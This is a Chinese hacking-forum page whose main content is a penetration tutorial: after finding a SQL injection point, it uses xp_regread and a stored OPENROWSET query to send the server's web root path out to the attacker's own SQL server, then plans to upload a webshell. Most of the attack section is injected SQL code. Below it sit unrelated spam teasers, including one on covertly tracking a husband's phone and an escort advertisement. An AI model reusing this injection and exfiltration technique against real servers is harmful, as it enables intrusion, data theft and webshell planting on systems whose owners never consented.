黑客监控联系-微信上的黑客联盟公共号(黑客联盟论坛微信

访客4年前黑客工具431

渗透中用openrowset搞shell的 ***
得到SQL注入点,首先想到的是BACKUPWEBSHELL,扔在NB里跑一圈,发现屏蔽了SQL错误信息,得不到物理路径,那还写个PP马了.
联想到一个权限不是很高的命令openrowset,进行跨库服务器查询,就是把一个SQL命令发送到远程数据库,然后看返回的结果,但是要启动事件跟踪!我们可以把网站信息写入数据库,然后%$^%$@#$@^%$~
首先在自己机器建立SQL数据库

然后在对方机器上建立个表createtable[dbo].[fenggou]([cha8][char](255))--

在对方执行DECLARE@resultvarchar(255)execmaster.dbo.xp_regread'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\VirtualRoots','/',@resultoutputinsertintofenggou(cha8)values('selecta.*FROMOPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密码'',''select*FROMpubs.dbo.authorswhereau_fname='''''+@result+''''''')ASa');--

这样fenggou这个表里就会有这样一条记录selecta.*FROMOPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密码','select*FROMpubs.dbo.authorswhereau_fname=''D:\WEB,,1''')ASa

不用说,''D:\WEB就是从注册表里读出的物理路径拉.然后执行DECLARE@a1char(255)set@a1=(selectcha8FROMfenggou)exec(@a1);--

等于执行了selecta.*FROMOPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密码','select*FROMpubs.dbo.authorswhereau_fname=''D:\WEB,,1''')ASa

OK,这时你在你机器上SQL事件追踪器上就会显示select*FROMpubs.dbo.authorswhereau_fname='D:\WEB,,1'
哇哈哈哈哈哈物理路径到手了写小马传大马吧~

相关文章

老公手机怎么定位跟踪(定位老公手机怎样定位)

丈夫手机怎么追踪定位(精准定位丈夫手机上如何定位) iPhone 4拥有全新升级的两面夹层玻璃 不锈钢边框设计方案、那时候业内最大画面质量的Retina显示屏和领跑一步的326ppi画面质量。iPh...

黑客帝国的故事有可能是真的吗(黑客帝国讲了什么故事)

黑客帝国的故事有可能是真的吗(黑客帝国讲了什么故事)

本文导读目录: 1、黑客帝国的情节是不是真实的 2、请问《黑客帝国》是不是真事? 3、黑客帝国里锡安是真实的还是虚拟的? 4、《黑客帝国4》可能是前传,消息靠谱吗? 5、黑客帝国会不会...

旬阳伴游-【陈访琴】

“旬阳伴游-【陈访琴】” 预约商务陷阱基本分为?a大家有没有听说过北京高端学生伴游的价格呢很多的北京高端学生伴游,他们的一些非常好的价格也是非常有必要了解的,越来越多的北京伴游他们会将自己的价格定...

什么歌适合做铃声(适合做女生手机铃声的歌曲

什么歌适合做铃声(适合做女生手机铃声的歌曲

今天小编想给大家推荐一些好听的欧美歌,不是那种烂大街的欧美歌,但是好听程度也是满分哦!下面就来看看是哪些歌曲吧! 【All Falls Down】歌手:Alan Walker/Digital F...

郑州富士康怎么样(郑州富士康旺季为何掀起离职潮)

  郑州富士康如何(郑州富士康热季为什么刮起辞职潮)郑州富士康后大半年的热季总算来啦,加班工资、奖励金、返费……大半年出来能挣几万块!每日从四面八方五湖四海来面试新员工入职的不计其数。殊不知,在如火如...

网盘外链:SEO支持外链的网盘有哪些?

网盘外链:SEO支持外链的网盘有哪些?

我们知道搜索引擎在链接中爬行,并阐明网站的相关性。搜索引擎优化人员天天城市实验利用差异的渠道来成立外部链接。个中有一个渠道:网络磁盘上的外部链接好像早已被人们遗忘。然而,仍有一些人操作这一计策来推广连...